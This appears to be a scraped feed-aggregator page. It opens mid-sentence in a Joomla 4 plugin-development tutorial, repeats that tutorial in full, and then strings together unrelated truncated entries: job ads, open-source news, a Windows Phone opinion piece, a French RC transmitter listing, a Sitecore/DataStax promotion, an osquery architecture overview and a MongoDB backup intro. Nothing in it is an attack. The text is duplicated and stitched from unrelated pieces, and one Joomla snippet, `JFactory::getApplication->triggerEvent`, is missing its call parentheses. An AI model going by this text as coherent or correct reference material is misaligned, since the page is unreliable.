If you want to allow the user to modify values you can then use the event result and getResults back out of it. You can look at

<source lang="php">
defined('_JEXEC') or die;

use BadMethodCallException;
use Joomla\CMS\Event\AbstractImmutableEvent;
use Joomla\CMS\Table\TableInterface;

/**
* Event class for an event
*/
class MyCustomEvent extends AbstractImmutableEvent
{
/**
* Constructor.
*
* @param string $name The event name.
* @param array $arguments The event arguments.
*
* @throws BadMethodCallException
*/
public function __construct($name, array $arguments = array())
{
if (!array_key_exists('myProperty', $arguments))
{
throw new BadMethodCallException("Argument 'myProperty' is required for event $name");
}

parent::__construct($name, $arguments);
}

/**
* Setter for the myProperty argument
*
* @param mixed $value The value to set
*
* @return mixed
*
* @throws BadMethodCallException if the argument is not of the expected type
*/
protected function setMyProperty($value)
{
if (!empty($value) && !is_object($value) && !is_array($value))
{
throw new BadMethodCallException("Argument 'src' of event {$this->name} must be empty, object or array");
}

return $value;
}
}
</source>

Why have we introduced this name class over parameters? Well it makes it easier to introduce custom setters and getters for properties - currently a plugin can either completely change a property as it wants - for a components there's no way of imposing any limitations. Additionally it makes it much easier for developers to add and remove parameters in an event without having major b/c issues (as you are now calling defined methods and are not subject to a property being the 2nd argument of your function).

==== How to achieve maximum compatibility with Joomla 3 ====
If you want to trigger an event in a similar way to the removed J3.x JEventDispatcher then you use code like this:

<source lang="php">
$results = JFactory::getApplication->triggerEvent( '<EventName>', <ParameterArray> );
</source>

It is important to note that the parameters have to be in an array. The plugin function itself will get the parameters as an Event object if it implements the SubscriberInterface and as individual values if it does not, but this method will always return an array that the plugin returns.

Note that if ANY plugin in a group doesn't implement the SubscriberInterface then the result property (as both a named parameter and result from a plugin) is used as a special property and cannot be used.


<noinclude>
[[Category:Tutorials{{#translation:}}]]
[[Category:Plugin Development{{#translation:}}]]
[[Category:Development{{#translation:}}]]
[[Category:Joomla!_4.x{{#translation:}}]]
</noinclude>

          J4.x:Creating a Plugin for Joomla/fr      Cache   Translate Page   Web Page Cache   

Created page with "Créer un plugin pour Joomla"

New page

<noinclude><languages /></noinclude>
{{Top portal heading|color=white-bkgd|icon=magic|icon-color=#5091cd|size=3x|text-color=#333|title=Tutorial<br />
How to create a Plugin for Joomla 4}}
<noinclude>{{Joomla version|version=4.x|comment=series}}</noinclude>
{{-}}
The plugin structure for Joomla! 1.5, 2.5 and 3.x was very flexible and powerful. Not only can plugins be used to handle events triggered by the core application and extensions, but plugins can also be used to make third party extensions extensible and powerful. In Joomla 4.x we have rewritten a lot of the dispatcher system behind this to increase the flexibility further when you modify the parameters passed as events whilst simultaneously increasing the performance of plugins.

This How-To should provide you with the basics of what you need to know to develop your own plugin. Most plugins consist of just a single code file but to correctly install the plugin code it must be packaged into an installation file which can be processed by the Joomla installer.

=== Creating the Installation File ===
As with all extensions in Joomla, plugins are easily installed as a .zip file (.tar.gz is also supported) but a correctly formatted XML file must be included. <br />
As an example, here is the XML installation file for the categories search plugin:

<source lang="xml">
<?xml version="1.0" encoding="utf-8"?>
<extension version="3.1" type="plugin" group="search" method="upgrade">
<name>plg_search_categories</name>
<author>Joomla! Project</author>
<creationDate>November 2005</creationDate>
<copyright>Copyright (C) 2005 - 2018 Open Source Matters. All rights reserved.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>PLG_SEARCH_CATEGORIES_XML_DESCRIPTION</description>
<files>
<filename plugin="categories">categories.php</filename>
</files>
<languages>
<language tag="en-GB">en-GB.plg_search_categories.ini</language>
<language tag="en-GB">en-GB.plg_search_categories.sys.ini</language>
</languages>
<config>
<fields name="params">

<fieldset name="basic">
<field
name="search_limit"
type="number"
label="JFIELD_PLG_SEARCH_SEARCHLIMIT_LABEL"
default="50"
/>

<field
name="search_content"
type="radio"
class="switcher"
label="JFIELD_PLG_SEARCH_ALL_LABEL"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>

<field
name="search_archived"
type="radio"
class="switcher"
label="JFIELD_PLG_SEARCH_ARCHIVED_LABEL"
default="0"
>
<option value="1">JYES</option>
<option value="0">JNO</option>
</field>
</fieldset>

</fields>
</config>
</extension>
</source>

As you can see, the system is similar to other Joomla XML installation files. You only have to look out for the <tt>group="xxx"</tt> entry in the <tt><extension></tt> tag and the extended information in the <tt><filename></tt> tag. This information tells Joomla into which folder to copy the file and to which group the plugin should be added.

If you are creating a plugin that responds to existing core events, the <tt>group="xxx"</tt> attribute would be changed to reflect the name of existing plugin folder for the event type you wish to augment. e.g. <tt>group="authentication"</tt> or <tt>group="user"</tt>. See [[S:MyLanguage/Plugin/Events|Plugin/Events]] for a complete list of existing core event categories. In creating a new plugin to respond to core events it is important that your plugin's name is unique and does not conflict with any of the other plugins that may also be responding to the core event you wish to service as well.

If you are creating a plugin to respond to non-core system events your choice for the <tt>group="xxx"</tt> tag should be different than any of the existing core categories.

'''TIP:''' ''If you add the attribute <tt>method="upgrade"</tt> to the tag <tt>extension</tt>, this plugin can be installed without uninstalling an earlier version. All existing files will be overwritten, but old files will not be deleted.''

=== Creating the Plugin ===
The object-oriented way of writing plugins involves writing a subclass of [https://api.joomla.org/cms-4/classes/Joomla.CMS.Plugin.CMSPlugin.html CMSPlugin], a base class that implements the basic properties of plugins. In your methods, the following properties are available:

* <tt>$this->params</tt>: the [[S:MyLanguage/Parameter|parameters]] set for this plugin by the administrator
* <tt>$this->_name</tt>: the name of the plugin
* <tt>$this->_type</tt>: the group (type) of the plugin
* <tt>$this->db</tt>: the db object
* <tt>$this->app</tt>: the application object

'''TIP:''' ''To use <tt>$this->db</tt> and <tt>$this->app</tt>, <tt>CMSPlugin</tt> tests if the property exists and is not private. If it is desired for the default objects to be used, create un-instantiated properties in the plugin class (i.e. <tt>protected $db; protected $app;</tt> in the same area as <tt>protected $autoloadLanguage = true;</tt>). The properties will not exist unless explicitly created.''

In the following code example, <tt><PluginGroup></tt> represents the group (type) of the plugin, and <tt><PluginName></tt> represents its name. Note that class and function names in PHP are case-insensitive.

We also implement the [https://api.joomla.org/framework-2/classes/Joomla.Event.SubscriberInterface.html SubscriberInterface] here which is the major change from Joomla 1.5-3.x. Instead of the function name automatically being detected and being the same as the event name this allows you to have custom function names. This allows us to tell what plugins are implementing what functions and as parsing public methods in PHP code is slow gives a significant performance boost.

Note throughout the Joomla 4 series there is a deprecated layer that will cover plugins using the old naming strategy of plugin names being the same as the event name when SubscriberInterface is not implemented.

<source lang="php">
<?php
// no direct access
defined( '_JEXEC' ) or die;

use Joomla\CMS\Plugin\CMSPlugin;
use Joomla\CMS\Event\Event;
use Joomla\Event\SubscriberInterface;

class Plg<PluginGroup><PluginName> extends CMSPlugin implements SubscriberInterface
{
/**
* Load the language file on instantiation
*
* @var boolean
* @since 3.1
*/
protected $autoloadLanguage = true;

/**
* Returns an array of events this subscriber will listen to.
*
* @return array
*/
public static function getSubscribedEvents(): array
{
return [
'<EventName>' => 'myFunctionName',
];
}

/**
* Plugin method is the array value in the getSubscribedEvents method
* The plugin then modifies the Event object (if it's not immutable)
*/
public function myFunctionName(Event $event)
{
/*
* Plugin code goes here.
* You can access parameters via $this->params
*/
return true;
}
}
?>
</source>

=== Using Plugins in Your Code ===
If you are creating a plugin for a new, non-core event, remember to activate your plugin after you install it. Precede any reference to your new plugin with the <tt>JPluginHelper::importPlugin()</tt> command.

Now that you've created your plugin, you will probably want to call it in your code. You might not: the Joomla core has a number of built-in events that you might want your plugin code to be registered to (and in that case you can ignore this section).

==== New Joomla 4 Way ====
The new way of doing this in Joomla 4 is to get the dispatcher and dispatch a named event.

<source lang="php">
use Joomla\CMS\Event\AbstractEvent;
use Joomla\CMS\Factory;

$dispatcher = Factory::getApplication()->getDispatcher();

// Here we create an event however as long as you implement EventInterface you can create your own
// custom classes
$event = AbstractEvent::create(
'<EventName>',
[
'name' => $value,
]
);

$eventResult = $dispatcher->dispatch('<EventName>', $event);
</source>

If you want to allow the user to modify values you can then use the event result and getResults back out of it. You can look at

<source lang="php">
defined('_JEXEC') or die;

use BadMethodCallException;
use Joomla\CMS\Event\AbstractImmutableEvent;
use Joomla\CMS\Table\TableInterface;

/**
* Event class for an event
*/
class MyCustomEvent extends AbstractImmutableEvent
{
/**
* Constructor.
*
* @param string $name The event name.
* @param array $arguments The event arguments.
*
* @throws BadMethodCallException
*/
public function __construct($name, array $arguments = array())
{
if (!array_key_exists('myProperty', $arguments))
{
throw new BadMethodCallException("Argument 'myProperty' is required for event $name");
}

parent::__construct($name, $arguments);
}

/**
* Setter for the myProperty argument
*
* @param mixed $value The value to set
*
* @return mixed
*
* @throws BadMethodCallException if the argument is not of the expected type
*/
protected function setMyProperty($value)
{
if (!empty($value) && !is_object($value) && !is_array($value))
{
throw new BadMethodCallException("Argument 'src' of event {$this->name} must be empty, object or array");
}

return $value;
}
}
</source>

Why have we introduced this name class over parameters? Well it makes it easier to introduce custom setters and getters for properties - currently a plugin can either completely change a property as it wants - for a components there's no way of imposing any limitations. Additionally it makes it much easier for developers to add and remove parameters in an event without having major b/c issues (as you are now calling defined methods and are not subject to a property being the 2nd argument of your function).

==== How to achieve maximum compatibility with Joomla 3 ====
If you want to trigger an event in a similar way to the removed J3.x JEventDispatcher then you use code like this:

<source lang="php">
$results = JFactory::getApplication->triggerEvent( '<EventName>', <ParameterArray> );
</source>

It is important to note that the parameters have to be in an array. The plugin function itself will get the parameters as an Event object if it implements the SubscriberInterface and as individual values if it does not, but this method will always return an array that the plugin returns.

Note that if ANY plugin in a group doesn't implement the SubscriberInterface then the result property (as both a named parameter and result from a plugin) is used as a special property and cannot be used.


<noinclude>
[[Category:Tutorials{{#translation:}}]]
[[Category:Plugin Development{{#translation:}}]]
[[Category:Development{{#translation:}}]]
[[Category:Joomla!_4.x{{#translation:}}]]
</noinclude>

          Getting started with Postfix, an open source mail transfer agent      Cache   Translate Page   Web Page Cache   

Here's how to set up and install Postfix to send Gmail using two-factor authentication.


          Java Developer - IAM - Codeworks - Milwaukee, WI      Cache   Translate Page   Web Page Cache   
Experience in J2EE web application development and ability to use open source libraries. Our direct client is seeking a Java Developer with experience in...
From Indeed - Thu, 02 Aug 2018 16:23:50 GMT - View all Milwaukee, WI jobs
          Getting started with Postfix, an open source mail transfer agent      Cache   Translate Page   Web Page Cache   

Here's how to set up and install Postfix to send Gmail using two-factor authentication.


          tf-nightly-gpu 1.11.0.dev20180810      Cache   Translate Page   Web Page Cache   
TensorFlow is an open source machine learning framework for everyone.
          tf-nightly 1.11.0.dev20180810      Cache   Translate Page   Web Page Cache   
TensorFlow is an open source machine learning framework for everyone.
          Strawberry: Quality sound, open source music player      Cache   Translate Page   Web Page Cache   

I recently received an email from Jonas Kvinge who forked the Clementine open source music player. Jonas writes:

I started working on a modified version of Clementine already in 2013, but because of other priorities, I did not pick up the work again before last year. I had not decided then if I was creating a fork, or contributing to Clementine. I ended up doing both. I started to see that I wanted the program development in a different direction. My focus was to create a music player for playing local music files, and not having to maintain support for multiple internet features that I did not use, and some which I did not want in the program at all… I also saw more and more that I disagree with the authors of Clementine and some statements that have been made regarding high-resolution audio.

Read more


          Google Boots Open Source Anti-Censorship Tool From Chrome Store      Cache   Translate Page   Web Page Cache   

A browser extension that acted as an anti-censorship tool for 185,000 people has been kicked out of the Chrome store by Google. The open source Ahoy! tool facilitated access to more than 1,700 blocked sites but is now under threat. Despite several requests, Google has provided no reason for its decision.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.


          Fixed Income Software Engineer      Cache   Translate Page   Web Page Cache   
NY-NEW YORK CITY, A prominent, data based global technology firm is currently seeking a Senior Software Engineer to join their team in New York. The firm's systems are very large and highly distributed, and engineers are always looking for creative solutions to solve problems, including employing a variety of modern programming languages, open source and big data technologies, as well as Machine Learning and Natura
          TuxMachines: Microsoft EEE and Openwashing      Cache   Translate Page   Web Page Cache   

read more


          TuxMachines: New LibreOffice Version Offers Fresh Take      Cache   Translate Page   Web Page Cache   

Potential LibreOffice adopters should consider possible downsides, urged king. With more than two decades into the "revolution" sparked by Linux and open source solutions, LibreOffice still constitutes a small fraction of the productivity applications and tools market.

Would that be the case if these offerings really were superior? Adopting any new platform requires retraining, and that includes LibreOffice, he said. Most employees arrive knowing at least the rudiments of Word and other Microsoft apps.

Plus, to its credit, Microsoft has addressed many user complaints and Office 365 makes it cheaper and easier to use the company's solutions than ever before, added King.

"So companies have to sort out why they are considering LibreOffice," he suggested, to determine "what potential benefits are actually achievable and whether leaving behind a longtime market leading solution (Office) really makes sense."

Read more

read more


          WinJS 3 – Windows, Phone and now Web too      Cache   Translate Page   Web Page Cache   

Originally posted on: http://kariem.net/archive/2014/10/05/winjs-3--windows-phone-and-now-web-too.aspx

At Build 2014, Microsoft announced that WinJS was going open source and the first goal was to make it available to web sites, not just Windows and phone apps. On September 17th, the first official release of WinJS 3.0 was made available and brought with it cross browser compatibility. Setting it up to work on your site is no different than any other JavaScript library. But extending a Universal, Windows or Phone app to also include a web interface that includes WinJS in another thing entirely.

In this article I will demonstrate how to create a web app with WinJS 3 and then reuse that code in a Universal app. I will then show how you can extend the capabilities of your site to include native WinRT features without using Cordova to create a hybrid application.

Read the full article I have posted over on Code Project.


          Armchair CEO: Windows Phone      Cache   Translate Page   Web Page Cache   

Originally posted on: http://kariem.net/archive/2013/09/14/armchair-ceo-windows-phone.aspx

So the Nokia thing finally happened, assuming the EU allows it.  Now with Nokia under the Microsoft umbrella, what should they focus on next?

Lumia Accessories

When people love their phones, they want to buy more stuff for their phones.  This is one area the iPhone has everyone beat by far, even Samsung.  Microsoft should concentrate on more branded accessories by working with vendors and stock more of the existing third party ones in their stores.  Especially cases.  They need a super rugged case that is not huge and bulky, and a great looking waterproof case ASAP.

Free License

Stop charging what’s left of the device manufacturers a license for Windows Phone.  You’re in third place.  With the purchase of Nokia, this might not be salvageable.

Day One Updates

All carriers, all devices updated on the same day, just like Apple.  Microsoft ought to be able to at least get AT&T to agree to this and they certainly can make sure Nokia is ready to go.  These staggered rollouts have to stop.

Better XBOX Music, Video and Podcasts

Music has some issues with syncing and storage of your own music, but its a great service.  Making it available on iOS and Android is a great idea.  Now make it perfect on Windows Phone.  Better playlists like Spotify would be good.  You’re so close.

Video sucks.  Videos purchased on the XBOX marketplace should sync offline or stream to Windows Phone.  And LOWER the price of the videos.  A huge win here would be to list Netflix, Hulu and other video services queues and search right into XBOX video on the phone.  Combine all your services into one app.  It doesn’t need to play them, it just needs to launch the other apps.  This should be extensible to all third party apps.  Finally, get the missing major apps: Amazon Video, HBO GO, Showtime Anytime and somehow bring back YouTube.

Podcasts suck as much as video.  This is terrible.  There are so many things that need to be fixed here its a complete overhaul.  At a minimum show podcasts you still have to watch in their own queue.  Multiple playlists would be even better.  Back to the drawing board on this one.  Take some lessons from WPodder, my personal favorite of all the third party apps available on the platform.

Android Apps

Windows Phone has a LOT going for it over iOS and Android.  I am finally at the point where I try to get people to switch.  Average users who get this phone, love it.  The only complaint is the app market.  Most of the big apps are there or have third party alternatives.  What you don’t see are new apps and small market apps until much later.  How many times have you seen an poster or ad with the “now available” on Apple App Store and Google Play logo without the Windows Store logo sitting right next to it.  The new Windows Phone App Studio could make a big difference for small apps, but not games.  Android is open source.  Build in integration into Windows Phone and make these apps available.  You can always try to push Windows Phone apps over the Android apps but this fills a huge gap real fast.  Want to stick it back to Google, build in the Amazon marketplace over Google Play.  So when I search for an app like Instragram it shows me the official app when it is available, otherwise it shows the Amazon app and finally if that’s not available it shows the Google Play app.  And alert me when the official app is available if I am running an Android app or point me to great third party apps.

Windows RT Convergence

Finally, start the road to a single Phone / RT OS.  Someday the idea of the single device will be achievable for the average user.


          PinWorthy.com–Our New Windows Phone 7 Site      Cache   Translate Page   Web Page Cache   

Originally posted on: http://kariem.net/archive/2011/04/09/pinworthy.comndashour-new-windows-phone-7-site.aspx

Know your audience.  I’m guessing more than a few Geeks With Blogs readers are also proud owners of Windows Phone 7 devices.  If you want to know more detail about the blog content itself, head on over to our launch post.  But for this readership crowd I’ll focus more on the technical.

Pin Worthy

  • We built the site on BlogEngine.NET 2.0
  • It uses a custom designed theme based on the Metro UI.  Want it?  Just ask in the comment section!  We have not open sourced it yet but if you pinky swear to share changes you make and not distribute it to other people (just point them to this post, we’ll get them a copy) you can have it. 
  • It also has a mobile theme with a similar Metro feel.  (see below)
  • There is a actual app in the works.  These are crazy easy to make using tools like AppMakr and Follow My Feed.

Please check us out and let us know what you think.

We’re also looking for contributors.

Pin Worthy Mobile


          Télécommande multifonction pour appareil RC Jumper T8SG Plus - 2.4G      Cache   Translate Page   Web Page Cache   
94,20€ - Banggood
Après avoir cherché un certain temps une promo sur une Taranis pour un projet de montage de drone, je me suis penché sur les modèles compatibles et j'ai trouvé cette Jumper qui a de bons retours.
Elle est compacte, multi-protocoles, avec des sticks à effet Hall et un écran OLED bien lisible et tourne sous DeviationTX.

Quelques tests :
https://www.helicomicro.com/2018/05/03/jumper-t8sg-v2-0-plus-le-test/
https://rotorbuilds.com/review/11221

Une review vidéo :
[shortcode id="9875073"/]


Fiche BangGood:

Description:
Marque: Jumper
Numéro d'article: T8SG V2.0 Plus
Taille: 158 x 150 x 58mm
Poids: 338g (sans batterie)
Fréquence de transmission: 2.400GHZ-2.7GHZ
Module transmetteur: quatre dans le module haute fréquence One (CC2500 CYRF6936 A7105 NRF2401)
Puissance d'émission: maximum 22dbm (puissance d'émission réglable)
Gain d'antenne: 2db (antenne détachable, modification facile)
Courant de travail: 88Ma@8.4V
Tension de fonctionnement: DC4.5-DC18V (usine avec 4 x boîte de batterie AA, batterie au lithium recommandée 2s ligne de tête équilibrée, piles non incluses)
Distance de contrôle à distance:> 2km @ 22dbm
Micrologiciel Open Source:
Nombre de canaux: jusqu'à 12 canaux (selon le récepteur)
Affichage: écran OLED de 2,42 pouces, résolution de 128 * 64
Manière de basculer: vecteur d'espace 3D sans contact Hall joystick
Baie de module compatible JR / FrSKY à l'arrière
Méthode de mise à niveau: mise à niveau en ligne USB
Protocoles de support:
* Walkera gamme complète
* DSM2 / X gamme complète
* Flysky et Flysky 2A
* FrSKY
* FUTABA s-fhss gamme complète
* Série WL Toy, série Hubsan, série Esky et bien d'autres (Actuellement, un total de plus de 40 protocoles pris en charge)
Utilise un logiciel open source avec un support et un développement continus, en ajoutant régulièrement de nouveaux protocoles.
Mode Simulateur: sortie standard de 3,5 mm en ppm
USB output.

Caractéristiques:
* Module RF quatre-en-un intégré (CC2500 CYRF6936 A7105 NRF2401).
* Micrologiciel multiprotocole open source, compatible avec la plupart des télécommandes traditionnelles
* Vecteur d'espace 3D sans contact Hall Capteur à distance Gimbals (T8SG Plus uniquement).
* T8SG Plus Écran OLED 2,42 pouces, affichage lumineux fonctionne même en plein soleil.
* Baie de module compatible JR / Frsky à l'arrière.
* Mise à jour du firmware en ligne USB.
* Puissance de transmission réglable pour s'adapter aux différentes exigences de localisation.
* Antenne détachable, facile à changer.
* Ultra-faible consommation d'énergie, durée de vie de la batterie plus longue.
* Jusqu'à 12 canaux de sortie (selon le récepteur), Open Source Firmware, tous les canaux sont entièrement programmables.
* Entrée de tension large (2s lipo recommandé).
* Menu multilingue.
* Fonction de rappel de vibration.
* Télémétrie de soutien (selon le récepteur).
* Etui portable inclus.

T8SG Plus améliorations:
1.) Toute nouvelle conception d'outillage donne une apparence unique et une sensation ergonomique.
2.) Deux commutateurs supérieurs d'addition ajoutés.
3.) Amélioration de la qualité du commutateur sur tous les commutateurs pour une meilleure fiabilité et une sensation de qualité.
4.) Toute nouvelle conception de cardan HALL SENSOR donne une précision plus fine et une réponse nette.
5.) Baie de module JR ajoutée pour les modules RF tiers
6.) Cadrans avant changés en roues de défilement latérales pour une meilleure utilisation.
7.) Port USB externe pour plus de commodité.
8.) Écran OLED rétroéclairé de 2,7 po
8.) Ajouté AA Batterie boîte pour l'installation de la batterie facile (2s Lipo en option)
9.) Amélioration de l'interrupteur avec deux indicateurs d'état LED.
10.) Boîte d'expédition améliorée, haute résistance avec l'aspect haut de gamme.
11.) Guide de démarrage rapide inclus.
          Full Stack Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Mon, 06 Aug 2018 23:18:47 GMT - View all Seattle, WA jobs
          Senior Front End Engineer, Intelligent Operating Network - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Fri, 20 Jul 2018 23:17:40 GMT - View all Seattle, WA jobs
          Senior Back End Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Mon, 16 Jul 2018 05:18:50 GMT - View all Seattle, WA jobs
          Back End Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Tue, 12 Jun 2018 23:18:07 GMT - View all Seattle, WA jobs
          Software Engineering Manager, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Thu, 31 May 2018 23:18:10 GMT - View all Seattle, WA jobs
          Senior Full Stack Engineer, Axon Records - Axon - Seattle, WA      Cache   Translate Page   Web Page Cache   
You follow the latest in open source technologies and can intuit the fine line between a promising new practice and an overhyped fad....
From Axon - Thu, 24 May 2018 23:18:05 GMT - View all Seattle, WA jobs
          RESPONSABILE UFFICIO PREVENTIVI - OSM open source management - Mapello, Lombardia      Cache   Translate Page   Web Page Cache   
Contratto a tempo determinato con reale opportunità di trasformarlo in indeterminato, possibilità di crescita e di sviluppo della propria professionalità,...
Da Indeed - Fri, 20 Jul 2018 12:02:05 GMT - Visualizza tutte le offerte di lavoro a Mapello, Lombardia
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Delivering Real Time Analytics with Sitecore and DataStax      Cache   Translate Page   Web Page Cache   

In one of myearlier articles, I talked about why your company or organization should adopt Sitecore as your Experience Platform. Its a good platform for users, content authors, and developers to create compelling and engaging digital experiences as well as collect information on website traffic. Machine learning and analytics in personalized content are two of the most compelling features of Sitecore. In today’s world, companies particularly the Fortune 500, require real-time analytics to help drive stakeholder goals.

It’s Tradition

Traditionally Sitecore used MongoDB as their experience database (xDB) of choice for storing and retrieving analytics. However, with the latest version of Sitecore, the company is moving to more options for development teams to use to fit their needs especially if they require real-time analytics. There are now options for using SQL Server’s new provider for NoSQL data. In fact, at the time of the writing, the only option for Sitecore 9 xDB deployment is the SQL Server Provider. The company has planned support for MongoDB but sent a clear message with their change of xDB choice in the latest version. The platform is also looking at expanding to higher end distributed NoSQL databases such as Microsoft Azure CosmosDB. This would require an Azure subscription but would offer features to support distributed analytics.

Why DataStax?

DataStax Enterprise (DSE) is analways-on, distributed cloud database built on Apache Cassandra and designed for the hybrid cloud. Our firm is making the argument that Apache Cassandra, and more importantly DataStax, should be used as your Analytics xDB option if you are building experiences for the Right-Now Economy . These are usually systems which use IoT ( internet of things ) or have global demand from a user audience of hundreds of millions and thus can never fail. That goes double for the analytical operations you run on the real-time data you are storing.

DataStax over the Competition

Cassandra and DataStax clearly outperform MongoDB and other rivals in Throughput by Workload and Load Process benchmarks. They also provide no single point of failure and more consistency models to support high-level operations. Cassandra is completely free and open source and supports both cloud or on-premise (translation you won’t need an Azure subscription like CosmosDB) but the real special sauce is with DataStax. DataStax is a commercial product, however, it is almost always used if Cassandra is being deployed on an enterprise level scale. DSE integrates Cassandra with graph, search, analytics, administration, developer tooling, and monitoring all in one platform. With Mongo or other NoSQL competitors, developers would have to piece together these functionalities with third-party options instead of native out of the box support. Developers can also create Spark jobs and see analytical data or personalize content in real time no matter how many users are viewing the experience. Other systems support Spark, however, they are usually deployed in a master to slave or parent to child relationship providing points of failure for both your users and your analytical operations. Furthermore, they tend to face challenges when an application needs to be global.

OurBusiness Platform Services

Need help with a Business Platform implementation or guidance in creating a tailor-fit design & architecture? Our team has decades of Business Platform experience and can help you transition onto the next phase of your technology eco-system, whether it be using Sitecore and DataStax, or simply a combination of common SaaS software like WordPress and Salesforce. Don’t know where to start? Check out ourservices or send us aquick email!

Resources DataStax Corporate DSE vs MongoDB

Photo by Carlos Muza on Unsplash


          Osquery: Under the Hood      Cache   Translate Page   Web Page Cache   

Four years, 243 contributors, and 4,573 commits (and counting!) have gone into the development of osquery . It is a complex project, with performance and reliability guarantees that have enabled its deployment on millions of hosts across a variety of top companies. Want to learn more about the architecture of the system?

This look under the hood is intended for users who want to step up their osquery game, developers interested in contributing to osquery, or anyone who would like to learn from the architecture of a successful open source project.

For those new to osquery, it may be useful to start with Monitoring macOS hosts with osquery , which provides an introduction to how the project is actually used.


Osquery: Under the Hood
Data flows withinosquery Query Engine

The promise of osquery is to serve up instrumentation data in a consistent fashion, enabling ordinary users to perform sophisticated analysis with a familiar SQL dialect. Osquery doesn’t just use SQLite syntax, the query engine is SQLite. Osquery gets all of the query parsing, optimization and execution functionality from SQLite, enabling the project to focus on finding the most relevant sources for instrumentation data.

Osquery doesn’t just use SQLite syntax, the query engine is SQLite.

It’s important to mention that, while osquery uses the SQLite query engine, it does not actually use SQLite for data storage. Most data is generated on-the-fly at query execution time through a concept we call “Virtual Tables”. Osquery does need to store some data on the host, and for this it uses an embedded RocksDB database (discussed later).


Osquery: Under the Hood
A complex osquery query: Find root processes with socket connections open to non-local hosts. Virtual Tables

Virtual Tables are the meat of osquery. They gather all the data that we serve up for analytics. Most virtual tables generate their data at query time ― by parsing a file or calling a system API.

Tables are defined via a DSL implemented in python. The osquery build system will read the table definition files, utilizing the directory hierarchy to determine which platforms they support, and then hook up all the plumbing for SQLite to dynamically retrieve data from the table.

At query time, the SQLite query engine will request the virtual table to generate data. The osquery code translates the SQLite table constraints in a fashion that the virtual table implementation can use to optimize (or entirely determine) which APIs/files it accesses to generate the data.

For example, take a simple virtual table like etc_hosts . This simply parses the /etc/hosts file and outputs each entry as a separate row. There’s little need for the virtual table implementation to receive the query parameters, as it will read the entire file in any case. After the virtual table generates the data, the SQLite engine performs any filtering provided in the WHERE clause.

A table like users can take advantage of the query context. The users table will check if uid or username are specified in the constraints, and use that to only load the metadata for the relevant users rather than doing a full enumeration of users. It would be fine for this table to ignore the constraints and simply allow SQLite to do the filtering, but we gain a slight performance advantage by only generating the requested data. In other instances, this performance difference could be much more extreme.

A final type of table must look at the query constraints to do any work at all. Take the hash table which calculates hashes of the referenced files. Without any constraint this table will not know what files to operate on (because it would be disastrous to try to hash every file on the system), and so will return no results.

The osquery developers have put a great deal of effort into making virtual table creation easy for community contributors. Create a simple spec file (using a custom DSL built in Python) and implement in C++ (or C/Objective-C as necessary). The build system will automatically hook things up so that the new table has full interoperability with all of the existing tables in the osquery ecosystem.

Schema file for etc_hosts table

Event System

Not all of the data exposed by osquery fits well into the model of generating on-the-fly when the table is queried. Take for example the common problem of file integrity monitoring (FIM). If we schedule a query to run every 5 minutes to capture the hash of important files on the system, we might miss an interval where an attacker changed that file and then reverted the change before our next scan. We need continuous visibility.

To solve problems like this, osquery has an event publisher/subscriber system that can generate, filter and store data to be exposed when the appropriate virtual table is queried. Event publishers run in their own thread and can use whatever APIs they need to create a stream of events to publish. For FIM on linux, the publisher generates events through inotify . It then publishes the events to one or more subscribers, which can filter and store the data (in RocksDB) as they see fit. Finally, when a user queries an event-based table, the relevant data is pulled from the store and run through the same SQLite filtering system as any other table results.

Scheduler

Some very careful design considerations went into the osquery scheduler. Consider deploying osquery on a massive scale, like the over 1 million production hosts in Facebook’s fleet. It could be a huge problem if each of these hosts ran the same query at the exact same time and caused a simultaneous spike in resource usage. So the scheduler provides a randomized “splay”, allowing queries to run on an approximate rather than exact interval. This simple design prevents resource spikes across the fleet.

It is also important to note that the scheduler doesn’t operate on clock time, but rather ticks from the running osquery process. On a server (that is never in sleep mode), this will effectively be clock time. On a laptop (often sleeping when the user closes the lid), osquery will only tick while the computer is active, and therefore scheduler time will not correspond well with clock time.

Diff Engine

In order to optimize for large scale and bubble up the most relevant data, osquery provides facilities for outputting differential query results. Each time a query runs, the results of that query are stored in the internal RocksDB store. When logs are output, the results of the current query are compared with the results of the existing query, and a log of the added/removed rows can be provided.

This is optional, and queries can be run in “snapshot” mode, in which the results are not stored and the entire set of query results are output on each scheduled run of the query.

RocksDB

Though much of the data that osquery presents is dynamically generated by the system state at query time, there are a myriad of contexts in which the agent stores data. For example, the events system needs a backing store to buffer events into between intervals of the queries running.

To achieve this, osquery utilizes another Facebook open
          A Review of MongoDB Backup Options      Cache   Translate Page   Web Page Cache   

Database backup is nothing but a way to protect or restore data. It is the process of storing the operational state, architecture, and data of your database. It can be very useful in situations of technical outage or disaster. So it is essential to keep the backup of your database and that your database has a good and easy process for backup.

MongoDB provides several tools/techniques to backup your databases easily.

In this article, we will discuss some of the top MongoDB backup and restore workflows.

Generally, there are three most common options to backup your MongoDB server/cluster.

Mongodump/Mongorestore MongoDB Cloud Manager Database Snapshots

Apart from these general options, there are other ways to backup your MongoDB. We will discuss all these options as well in this article. Let’s get started.

MongoDump/MongoRestore

